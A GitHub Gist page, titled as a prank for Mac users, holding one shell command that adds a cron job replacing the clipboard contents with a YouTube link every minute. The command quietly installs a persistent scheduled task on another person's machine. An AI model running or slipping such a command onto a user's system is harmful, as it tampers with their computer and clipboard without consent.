Skip to content

Instantly share code, notes, and snippets.

@jphastings
Created February 4, 2015 14:36
Show Gist options
  • Save jphastings/dc099a3e89d18ee7329b to your computer and use it in GitHub Desktop.
Save jphastings/dc099a3e89d18ee7329b to your computer and use it in GitHub Desktop.
A little prank for mac users…
(crontab -l; echo "* * * * * echo 'https://www.youtube.com/watch?v=BROWqjuTM0g' | pbcopy" ) | crontab -
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment